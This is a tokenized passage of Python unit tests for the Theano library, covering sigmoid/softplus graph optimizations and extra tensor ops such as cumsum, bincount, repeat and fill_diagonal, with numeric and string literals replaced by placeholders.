toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:3> <EOL> assert tensor . is_flat ( topo [ <NUM_LIT:0> ] . outputs [ <NUM_LIT:0> ] ) <EOL> assert isinstance ( topo [ <NUM_LIT:1> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> assert isinstance ( topo [ <NUM_LIT:2> ] . op . scalar_op , theano . scalar . Neg ) <EOL> f ( numpy . random . rand ( <NUM_LIT> , <NUM_LIT:11> ) . astype ( config . floatX ) ) <EOL> out = T . log ( <NUM_LIT:1> - sigmoid ( x ) . reshape ( [ x . size ] ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert any ( isinstance ( node . op , T . Reshape ) for node in topo ) <EOL> assert any ( isinstance ( getattr ( node . op , '<STR_LIT>' , None ) , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> for node in topo ) <EOL> f ( numpy . random . rand ( <NUM_LIT> , <NUM_LIT:11> ) . astype ( config . floatX ) ) <EOL> def test_log1pexp_to_softplus ( self ) : <EOL> m = theano . config . mode <EOL> if m == '<STR_LIT>' : <EOL> m = '<STR_LIT>' <EOL> x = T . vector ( ) <EOL> out = T . log ( <NUM_LIT:1> + T . exp ( x ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> assert isinstance ( topo [ <NUM_LIT:0> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> f ( numpy . random . rand ( <NUM_LIT> ) . astype ( config . floatX ) ) <EOL> class T_sigmoid_utils ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_compute_mul ( self ) : <EOL> x , y , z = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ) <EOL> tree = ( x * y ) * - z <EOL> mul_tree = parse_mul_tree ( tree ) <EOL> assert parse_mul_tree ( compute_mul ( mul_tree ) ) == mul_tree <EOL> assert theano . gof . graph . is_same_graph ( <EOL> compute_mul ( parse_mul_tree ( tree ) ) , tree ) <EOL> def test_parse_mul_tree ( self ) : <EOL> x , y , z = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ) <EOL> assert parse_mul_tree ( x * y ) == [ False , [ [ False , x ] , [ False , y ] ] ] <EOL> assert parse_mul_tree ( - ( x * y ) ) == [ True , [ [ False , x ] , [ False , y ] ] ] <EOL> assert parse_mul_tree ( - x * y ) == [ False , [ [ True , x ] , [ False , y ] ] ] <EOL> assert parse_mul_tree ( - x ) == [ True , x ] <EOL> assert parse_mul_tree ( ( x * y ) * - z ) == [ <EOL> False , [ [ False , [ [ False , x ] , [ False , y ] ] ] , [ True , z ] ] ] <EOL> def test_is_1pexp ( self ) : <EOL> backup = config . warn . identify_1pexp_bug <EOL> config . warn . identify_1pexp_bug = False <EOL> try : <EOL> x = tensor . vector ( '<STR_LIT:x>' ) <EOL> exp = tensor . exp <EOL> assert is_1pexp ( <NUM_LIT:1> + exp ( x ) ) == ( False , x ) <EOL> assert is_1pexp ( exp ( x ) + <NUM_LIT:1> ) == ( False , x ) <EOL> for neg , exp_arg in imap ( is_1pexp , [ ( <NUM_LIT:1> + exp ( - x ) ) , ( exp ( - x ) + <NUM_LIT:1> ) ] ) : <EOL> assert not neg and theano . gof . graph . is_same_graph ( exp_arg , - x ) <EOL> assert is_1pexp ( <NUM_LIT:1> - exp ( x ) ) is None <EOL> assert is_1pexp ( <NUM_LIT:2> + exp ( x ) ) is None <EOL> assert is_1pexp ( exp ( x ) + <NUM_LIT:2> ) is None <EOL> assert is_1pexp ( exp ( x ) - <NUM_LIT:1> ) is None <EOL> assert is_1pexp ( - <NUM_LIT:1> + exp ( x ) ) is None <EOL> assert is_1pexp ( <NUM_LIT:1> + <NUM_LIT:2> * exp ( x ) ) is None <EOL> finally : <EOL> config . warn . identify_1pexp_bug = backup </s>
<s> import unittest <EOL> import numpy as np <EOL> import numpy <EOL> import theano <EOL> from theano . tests import unittest_tools as utt <EOL> from theano . tensor . extra_ops import ( CumsumOp , cumsum , CumprodOp , cumprod , <EOL> CpuContiguous , cpu_contiguous , BinCountOp , <EOL> bincount , DiffOp , diff , squeeze , compress , <EOL> RepeatOp , repeat , Bartlett , bartlett , <EOL> FillDiagonal , fill_diagonal , <EOL> FillDiagonalOffset , fill_diagonal_offset , <EOL> to_one_hot , Unique ) <EOL> from theano import tensor as T <EOL> from theano import config , tensor , function <EOL> from theano . tests . unittest_tools import attr <EOL> numpy_ver = [ int ( n ) for n in numpy . __version__ . split ( '<STR_LIT:.>' ) [ : <NUM_LIT:2> ] ] <EOL> numpy_16 = bool ( numpy_ver >= [ <NUM_LIT:1> , <NUM_LIT:6> ] ) <EOL> def test_cpu_contiguous ( ) : <EOL> a = T . fmatrix ( '<STR_LIT:a>' ) <EOL> i = T . iscalar ( '<STR_LIT:i>' ) <EOL> a_val = numpy . asarray ( numpy . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) , dtype = '<STR_LIT>' ) <EOL> f = theano . function ( [ a , i ] , cpu_contiguous ( a . reshape ( ( <NUM_LIT:5> , <NUM_LIT:4> ) ) [ : : i ] ) ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert any ( [ isinstance ( node . op , CpuContiguous ) for node in topo ] ) <EOL> assert f ( a_val , <NUM_LIT:1> ) . flags [ '<STR_LIT>' ] <EOL> assert f ( a_val , <NUM_LIT:2> ) . flags [ '<STR_LIT>' ] <EOL> assert f ( a_val , <NUM_LIT:3> ) . flags [ '<STR_LIT>' ] <EOL> class TestCumsumOp ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestCumsumOp , self ) . setUp ( ) <EOL> self . op_class = CumsumOp <EOL> self . op = CumsumOp ( ) <EOL> def test_cumsumOp ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . assertRaises ( ValueError , cumsum , x , axis = <NUM_LIT:3> ) <EOL> self . assertRaises ( ValueError , cumsum , x , axis = - <NUM_LIT:4> ) <EOL> f = theano . function ( [ x ] , cumsum ( x ) ) <EOL> assert np . allclose ( np . cumsum ( a ) , f ( a ) ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> f = theano . function ( [ x ] , cumsum ( x , axis = axis ) ) <EOL> assert np . allclose ( np . cumsum ( a , axis = axis ) , f ( a ) ) <EOL> def test_infer_shape ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( [ x ] , <EOL> [ self . op ( x ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> self . _compile_and_check ( [ x ] , <EOL> [ cumsum ( x , axis = axis ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> def test_grad ( self ) : <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> utt . verify_grad ( self . op , [ a ] ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> utt . verify_grad ( self . op_class ( axis = axis ) , [ a ] , eps = <NUM_LIT> ) <EOL> class TestCumprodOp ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestCumprodOp , self ) . setUp ( ) <EOL> self . op_class = CumprodOp <EOL> self . op = CumprodOp ( ) <EOL> def test_CumprodOp ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . assertRaises ( ValueError , cumprod , x , axis = <NUM_LIT:3> ) <EOL> self . assertRaises ( ValueError , cumprod , x , axis = - <NUM_LIT:4> ) <EOL> f = theano . function ( [ x ] , cumprod ( x ) ) <EOL> assert np . allclose ( np . cumprod ( a ) , f ( a ) ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> f = theano . function ( [ x ] , cumprod ( x , axis = axis ) ) <EOL> assert np . allclose ( np . cumprod ( a , axis = axis ) , f ( a ) ) <EOL> def test_infer_shape ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( [ x ] , <EOL> [ self . op ( x ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> self . _compile_and_check ( [ x ] , <EOL> [ cumprod ( x , axis = axis ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> def test_grad ( self ) : <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> utt . verify_grad ( self . op , [ a ] ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> utt . verify_grad ( self . op_class ( axis = axis ) , [ a ] ) <EOL> class TestBinCountOp ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestBinCountOp , self ) . setUp ( ) <EOL> self . op_class = BinCountOp <EOL> self . op = BinCountOp ( ) <EOL> def test_bincountFn ( self ) : <EOL> w = T . vector ( '<STR_LIT:w>' ) <EOL> def ref ( data , w = None , minlength = None ) : <EOL> size = data . max ( ) + <NUM_LIT:1> <EOL> if minlength : <EOL> size = max ( size , minlength ) <EOL> if w is not None : <EOL> out = np . zeros ( size , dtype = w . dtype ) <EOL> for i in range ( data . shape [ <NUM_LIT:0> ] ) : <EOL> out [ data [ i ] ] += w [ i ] <EOL> else : <EOL> out = np . zeros ( size , dtype = a . dtype ) <EOL> for i in range ( data . shape [ <NUM_LIT:0> ] ) : <EOL> out [ data [ i ] ] += <NUM_LIT:1> <EOL> return out <EOL> for dtype in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> x = T . vector ( '<STR_LIT:x>' , dtype = dtype ) <EOL> a = np . random . random_integers ( <NUM_LIT:50> , size = ( <NUM_LIT> ) ) . astype ( dtype ) <EOL> weights = np . random . random ( ( <NUM_LIT> , ) ) . astype ( config . floatX ) <EOL> f1 = theano . function ( [ x ] , bincount ( x ) ) <EOL> f2 = theano . function ( [ x , w ] , bincount ( x , weights = w ) ) <EOL> assert ( ref ( a ) == f1 ( a ) ) . all ( ) <EOL> assert np . allclose ( ref ( a , weights ) , f2 ( a , weights ) ) <EOL> f3 = theano . function ( [ x ] , bincount ( x , minlength = <NUM_LIT> ) ) <EOL> f4 = theano . function ( [ x ] , bincount ( x , minlength = <NUM_LIT:5> ) ) <EOL> assert ( ref ( a , minlength = <NUM_LIT> ) == f3 ( a ) ) . all ( ) <EOL> assert ( ref ( a , minlength = <NUM_LIT:5> ) == f4 ( a ) ) . all ( ) <EOL> if not dtype . startswith ( '<STR_LIT:u>' ) : <EOL> a [ <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> f5 = theano . function ( [ x ] , bincount ( x , assert_nonneg = True ) ) <EOL> self . assertRaises ( AssertionError , f5 , a ) <EOL> def test_bincountOp ( self ) : <EOL> w = T . vector ( '<STR_LIT:w>' ) <EOL> for dtype in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> int_bitwidth = theano . configdefaults . python_int_bitwidth ( ) <EOL> if int_bitwidth == <NUM_LIT:64> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , ) <EOL> if int_bitwidth == <NUM_LIT:32> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> x = T . vector ( '<STR_LIT:x>' , dtype = dtype ) <EOL> if dtype in numpy_unsupported_dtypes : <EOL> self . assertRaises ( TypeError , BinCountOp ( ) , x ) <EOL> else : <EOL> a = np . random . random_integers ( <NUM_LIT:50> , size = ( <NUM_LIT> ) ) . astype ( dtype ) <EOL> weights = np . random . random ( ( <NUM_LIT> , ) ) . astype ( config . floatX ) <EOL> f1 = theano . function ( [ x ] , BinCountOp ( ) ( x , weights = None ) ) <EOL> f2 = theano . function ( [ x , w ] , BinCountOp ( ) ( x , weights = w ) ) <EOL> assert ( np . bincount ( a ) == f1 ( a ) ) . all ( ) <EOL> assert np . allclose ( np . bincount ( a , weights = weights ) , <EOL> f2 ( a , weights ) ) <EOL> if not numpy_16 : <EOL> continue <EOL> f3 = theano . function ( [ x ] , BinCountOp ( minlength = <NUM_LIT> ) ( x , weights = None ) ) <EOL> f4 = theano . function ( [ x ] , BinCountOp ( minlength = <NUM_LIT:5> ) ( x , weights = None ) ) <EOL> assert ( np . bincount ( a , minlength = <NUM_LIT> ) == f3 ( a ) ) . all ( ) <EOL> assert ( np . bincount ( a , minlength = <NUM_LIT:5> ) == f4 ( a ) ) . all ( ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_infer_shape ( self ) : <EOL> for dtype in tensor . discrete_dtypes : <EOL> int_bitwidth = theano . configdefaults . python_int_bitwidth ( ) <EOL> if int_bitwidth == <NUM_LIT:64> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , ) <EOL> if int_bitwidth == <NUM_LIT:32> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> x = T . vector ( '<STR_LIT:x>' , dtype = dtype ) <EOL> if dtype in numpy_unsupported_dtypes : <EOL> self . assertRaises ( TypeError , BinCountOp ( ) , x ) <EOL> else : <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( ) ( x , None ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> weights = np . random . random ( ( <NUM_LIT> , ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( ) ( x , weights = weights ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> if not numpy_16 : <EOL> continue <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( minlength = <NUM_LIT> ) ( x , weights = weights ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( minlength = <NUM_LIT:5> ) ( x , weights = weights ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> class TestDiffOp ( utt . InferShapeTester ) : <EOL> nb = <NUM_LIT:10> <EOL> def setUp ( self ) : <EOL> super ( TestDiffOp , self ) . setUp ( ) <EOL> self . op_class = DiffOp <EOL> self . op = DiffOp ( ) <EOL> def test_diffOp ( self ) : <EOL> x = T . matrix ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:30> , <NUM_LIT:50> ) ) . astype ( config . floatX ) <EOL> f = theano . function ( [ x ] , diff ( x ) ) <EOL> assert np . allclose ( np . diff ( a ) , f ( a ) ) <EOL> for axis in range ( len ( a . shape ) ) : <EOL> for k in range ( TestDiffOp . nb ) : <EOL> g = theano . function ( [ x ] , diff ( x , n = k , axis = axis ) ) <EOL> assert np . allclose ( np . diff ( a , n = k , axis = axis ) , g ( a ) ) <EOL> def test_infer_shape ( self ) : <EOL> x = T . matrix ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:30> , <NUM_LIT:50> ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( [ x ] , <EOL> [ self . op ( x ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> for axis in range ( len ( a . shape ) ) : <EOL> for k in range ( TestDiffOp . nb ) : <EOL> self . _compile_and_check ( [ x ] , <EOL> [ diff ( x , n = k , axis = axis ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> def test_grad ( self ) : <EOL> x = T . vector ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( <NUM_LIT:50> ) . astype ( config . floatX ) <EOL> theano . function ( [ x ] , T . grad ( T . sum ( diff ( x ) ) , x ) ) <EOL> utt . verify_grad ( self . op , [ a ] ) <EOL> for k in range ( TestDiffOp . nb ) : <EOL> theano . function ( [ x ] , T . grad ( T . sum ( diff ( x , n = k ) ) , x ) ) <EOL> utt . verify_grad ( DiffOp ( n = k ) , [ a ] , eps = <NUM_LIT> ) <EOL> class SqueezeTester ( utt . InferShapeTester ) : <EOL> shape_list = [ ( <NUM_LIT:1> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:6> ) ] <EOL> broadcast_list = [ [ True , False ] , <EOL> [ True , False , False ] , <EOL> [ True , False , True , True , False ] ] <EOL> def setUp ( self ) : <EOL> super ( SqueezeTester , self ) . setUp ( ) <EOL> self . op = squeeze <EOL> def test_op ( self ) : <EOL> for shape , broadcast in zip ( self . shape_list , self . broadcast_list ) : <EOL> data = numpy . random . random ( size = shape ) . astype ( theano . config . floatX ) <EOL> variable = tensor . TensorType ( theano . config . floatX , broadcast ) ( ) <EOL> f = theano . function ( [ variable ] , self . op ( variable ) ) <EOL> expected = numpy . squeeze ( data ) <EOL> tested = f ( data ) <EOL> assert tested . shape == expected . shape <EOL> assert numpy . allclose ( tested , expected ) <EOL> def test_infer_shape ( self ) : <EOL> for shape , broadcast in zip ( self . shape_list , self . broadcast_list ) : <EOL> data = numpy . random . random ( size = shape ) . astype ( theano . config . floatX ) <EOL> variable = tensor . TensorType ( theano . config . floatX , broadcast ) ( ) <EOL> self . _compile_and_check ( [ variable ] , <EOL> [ self . op ( variable ) ] , <EOL> [ data ] , <EOL> tensor . DimShuffle , <EOL> warn = False ) <EOL> def test_grad ( self ) : <EOL> for shape , broadcast in zip ( self . shape_list , self . broadcast_list ) : <EOL> data = numpy . random . random ( size = shape ) . astype ( theano . config . floatX ) <EOL> utt . verify_grad ( self . op , [ data ] ) <EOL> def test_var_interface ( self ) : <EOL> for shape , broadcast in zip ( self . shape_list , self . broadcast_list ) : <EOL> data = numpy . random . random ( size = shape ) . astype ( theano . config . floatX ) <EOL> variable = tensor . TensorType ( theano . config . floatX , broadcast ) ( ) <EOL> f = theano . function ( [ variable ] , variable . squeeze ( ) ) <EOL> expected = numpy . squeeze ( data ) <EOL> tested = f ( data ) <EOL> assert tested . shape == expected . shape <EOL> assert numpy . allclose ( tested , expected ) <EOL> class CompressTester ( utt . InferShapeTester ) : <EOL> axis_list = [ None , <EOL> - <NUM_LIT:1> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT:1> ] <EOL> cond_list = [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] <EOL> shape_list = [ ( <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:5> ) ] <EOL> def setUp ( self ) : <EOL> super ( CompressTester , self ) . setUp ( ) <EOL> self . op = compress <EOL> def test_op ( self ) : <EOL> for axis , cond , shape in zip ( self . axis_list , self . cond_list , <EOL> self . shape_list ) : <EOL> cond_var = theano . tensor . ivector ( ) <EOL> data = numpy . random . random ( size = shape ) . astype ( theano . config . floatX ) <EOL> data_var = theano . tensor . matrix ( ) <EOL> f = theano . function ( [ cond_var , data_var ] , <EOL> self . op ( cond_var , data_var , axis = axis ) ) <EOL> expected = numpy . compress ( cond , data , axis = axis ) <EOL> tested = f ( cond , data ) <EOL> assert tested . shape == expected . shape <EOL> assert numpy . allclose ( tested , expected ) <EOL> class TestRepeatOp ( utt . InferShapeTester ) : <EOL> def _possible_axis ( self , ndim ) : <EOL> return [ None ] + list ( range ( ndim ) ) + [ - i for i in range ( ndim ) ] <EOL> def setUp ( self ) : <EOL> super ( TestRepeatOp , self ) . setUp ( ) <EOL> self . op_class = RepeatOp <EOL> self . op = RepeatOp ( ) <EOL> ptr_bitwidth = theano . configdefaults . local_bitwidth ( ) <EOL> if ptr_bitwidth == <NUM_LIT:64> : <EOL> self . numpy_unsupported_dtypes = ( '<STR_LIT>' , ) <EOL> if ptr_bitwidth == <NUM_LIT:32> : <EOL> self . numpy_unsupported_dtypes = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_repeatOp ( self ) : <EOL> for ndim in range ( <NUM_LIT:3> ) : <EOL> x = T . TensorType ( config . floatX , [ False ] * ndim ) ( ) <EOL> a = np . random . random ( ( <NUM_LIT:10> , ) * ndim ) . astype ( config . floatX ) <EOL> for axis in self . _possible_axis ( ndim ) : <EOL> for dtype in tensor . discrete_dtypes : <EOL> r_var = T . scalar ( dtype = dtype ) <EOL> r = numpy . asarray ( <NUM_LIT:3> , dtype = dtype ) <EOL> if ( dtype == '<STR_LIT>' or <EOL> ( dtype in self . numpy_unsupported_dtypes and r_var . ndim == <NUM_LIT:1> ) ) : <EOL> self . assertRaises ( TypeError , <EOL> repeat , x , r_var , axis = axis ) <EOL> else : <EOL> f = theano . function ( [ x , r_var ] , <EOL> repeat ( x , r_var , axis = axis ) ) <EOL> assert np . allclose ( np . repeat ( a , r , axis = axis ) , <EOL> f ( a , r ) ) <EOL> r_var = T . vector ( dtype = dtype ) <EOL> if axis is None : <EOL> r = np . random . random_integers ( <EOL> <NUM_LIT:5> , size = a . size ) . astype ( dtype ) <EOL> else : <EOL> r = np . random . random_integers ( <EOL> <NUM_LIT:5> , size = ( <NUM_LIT:10> , ) ) . astype ( dtype ) <EOL> if dtype in self . numpy_unsupported_dtypes and r_var . ndim == <NUM_LIT:1> : <EOL> self . assertRaises ( TypeError , <EOL> repeat , x , r_var , axis = axis ) <EOL> else : <EOL> f = theano . function ( [ x , r_var ] , <EOL> repeat ( x , r_var , axis = axis ) ) <EOL> assert np . allclose ( np . repeat ( a , r , axis = axis ) , <EOL> f ( a , r ) ) <EOL> r = np . random . random_integers ( <NUM_LIT:10> , size = ( ) ) . astype ( dtype ) + <NUM_LIT:2> <EOL> f = theano . function ( [ x ] , <EOL> repeat ( x , [ r ] , axis = axis ) ) <EOL> assert np . allclose ( np . repeat ( a , r , axis = axis ) , <EOL> f ( a ) ) <EOL> assert not np . any ( [ isinstance ( n . op , RepeatOp ) <EOL> for n in f . maker . fgraph . toposort ( ) ] ) <EOL> r_var = theano . tensor . TensorType ( broadcastable = ( True , ) , <EOL> dtype = dtype ) ( ) <EOL> r = np . random . random_integers ( <NUM_LIT:5> , size = ( <NUM_LIT:1> , ) ) . astype ( dtype ) <EOL> f = theano . function ( [ x , r_var ] , <EOL> repeat ( x , r_var , axis = axis ) ) <EOL> assert np . allclose ( np . repeat ( a , r [ <NUM_LIT:0> ] , axis = axis ) , <EOL> f ( a , r ) ) <EOL> assert not np . any ( [ isinstance ( n . op , RepeatOp ) <EOL> for n in f . maker . fgraph . toposort ( ) ] ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_infer_shape ( self ) : <EOL> for ndim in range ( <NUM_LIT:4> ) : <EOL> x = T . TensorType ( config . floatX , [ False ] * ndim ) ( ) <EOL> shp = ( numpy . arange ( ndim ) + <NUM_LIT:1> ) * <NUM_LIT:5> <EOL> a = np . random . random ( shp ) . astype ( config . floatX ) <EOL> for axis in self . _possible_axis ( ndim ) : <EOL> for dtype in tensor . discrete_dtypes : <EOL> r_var = T . scalar ( dtype = dtype ) <EOL> r = numpy . asarray ( <NUM_LIT:3> , dtype = dtype ) <EOL> if dtype in self . numpy_unsupported_dtypes : <EOL> r_var = T . vector ( dtype = dtype ) <EOL> self . assertRaises ( TypeError , repeat , x , r_var ) <EOL> else : <EOL> self . _compile_and_check ( <EOL> [ x , r_var ] , <EOL> [ RepeatOp ( axis = axis ) ( x , r_var ) ] , <EOL> [ a , r ] , <EOL> self . op_class ) <EOL> r_var = T . vector ( dtype = dtype ) <EOL> if axis is None : <EOL> r = np . random . random_integers ( <EOL> <NUM_LIT:5> , size = a . size ) . astype ( dtype ) <EOL> elif a . size > <NUM_LIT:0> : <EOL> r = np . random . random_integers ( <EOL> <NUM_LIT:5> , size = a . shape [ axis ] ) . astype ( dtype ) <EOL> else : <EOL> r = np . random . random_integers ( <EOL> <NUM_LIT:5> , size = ( <NUM_LIT:10> , ) ) . astype ( dtype ) <EOL> self . _compile_and_check ( <EOL> [ x , r_var ] , <EOL> [ RepeatOp ( axis = axis ) ( x , r_var ) ] , <EOL> [ a , r ] , <EOL> self . op_class ) <EOL> def test_grad ( self ) : <EOL> for ndim in range ( <NUM_LIT:3> ) : <EOL> a = np . random . random ( ( <NUM_LIT:10> , ) * ndim ) . astype ( config . floatX ) <EOL> for axis in self . _possible_axis ( ndim ) : <EOL> utt . verify_grad ( lambda x : RepeatOp ( axis = axis ) ( x , <NUM_LIT:3> ) , [ a ] ) <EOL> def test_broadcastable ( self ) : <EOL> x = T . TensorType ( config . floatX , [ False , True , False ] ) ( ) <EOL> r = RepeatOp ( axis = <NUM_LIT:1> ) ( x , <NUM_LIT:2> ) <EOL> self . assertEqual ( r . broadcastable , ( False , False , False ) ) <EOL> r = RepeatOp ( axis = <NUM_LIT:1> ) ( x , <NUM_LIT:1> ) <EOL> self . assertEqual ( r . broadcastable , ( False , True , False ) ) <EOL> r = RepeatOp ( axis = <NUM_LIT:0> ) ( x , <NUM_LIT:2> ) <EOL> self . assertEqual ( r . broadcastable , ( False , True , False ) ) <EOL> class TestBartlett ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestBartlett , self ) . setUp ( ) <EOL> self . op_class = Bartlett <EOL> self . op = bartlett <EOL> def test_perform ( self ) : <EOL> x = tensor . lscalar ( ) <EOL> f = function ( [ x ] , self . op ( x ) ) <EOL> M = numpy . random . random_integers ( <NUM_LIT:3> , <NUM_LIT:50> , size = ( ) ) <EOL> assert numpy . allclose ( f ( M ) , numpy . bartlett ( M ) ) <EOL> assert numpy . allclose ( f ( <NUM_LIT:0> ) , numpy . bartlett ( <NUM_LIT:0> ) ) <EOL> assert numpy . allclose ( f ( - <NUM_LIT:1> ) , numpy . bartlett ( - <NUM_LIT:1> ) ) <EOL> b = numpy . array ( [ <NUM_LIT> ] , dtype = '<STR_LIT>' ) <EOL> assert numpy . allclose ( f ( b [ <NUM_LIT:0> ] ) , numpy . bartlett ( b [ <NUM_LIT:0> ] ) ) <EOL> def test_infer_shape ( self ) : <EOL> x = tensor . lscalar ( ) <EOL> self . _compile_and_check ( [ x ] , [ self . op ( x ) ] , <EOL> [ numpy . random . random_integers ( <NUM_LIT:3> , <NUM_LIT:50> , size = ( ) ) ] , <EOL> self . op_class ) <EOL> self . _compile_and_check ( [ x ] , [ self . op ( x ) ] , [ <NUM_LIT:0> ] , self . op_class ) <EOL> self . _compile_and_check ( [ x ] , [ self . op ( x ) ] , [ <NUM_LIT:1> ] , self . op_class ) <EOL> class TestFillDiagonal ( utt . InferShapeTester ) : <EOL> rng = numpy . random . RandomState ( <NUM_LIT> ) <EOL> def setUp ( self ) : <EOL> super ( TestFillDiagonal , self ) . setUp ( ) <EOL> self . op_class = FillDiagonal <EOL> self . op = fill_diagonal <EOL> def test_perform ( self ) : <EOL> x = tensor . matrix ( ) <EOL> y = tensor . scalar ( ) <EOL> f = function ( [ x , y ] , fill_diagonal ( x , y ) ) <EOL> for shp in [ ( <NUM_LIT:8> , <NUM_LIT:8> ) , ( <NUM_LIT:5> , <NUM_LIT:8> ) , ( <NUM_LIT:8> , <NUM_LIT:5> ) ] : <EOL> a = numpy . random . rand ( * shp ) . astype ( config . floatX ) <EOL> val = numpy . cast [ config . floatX ] ( numpy . random . rand ( ) ) <EOL> out = f ( a , val ) <EOL> assert 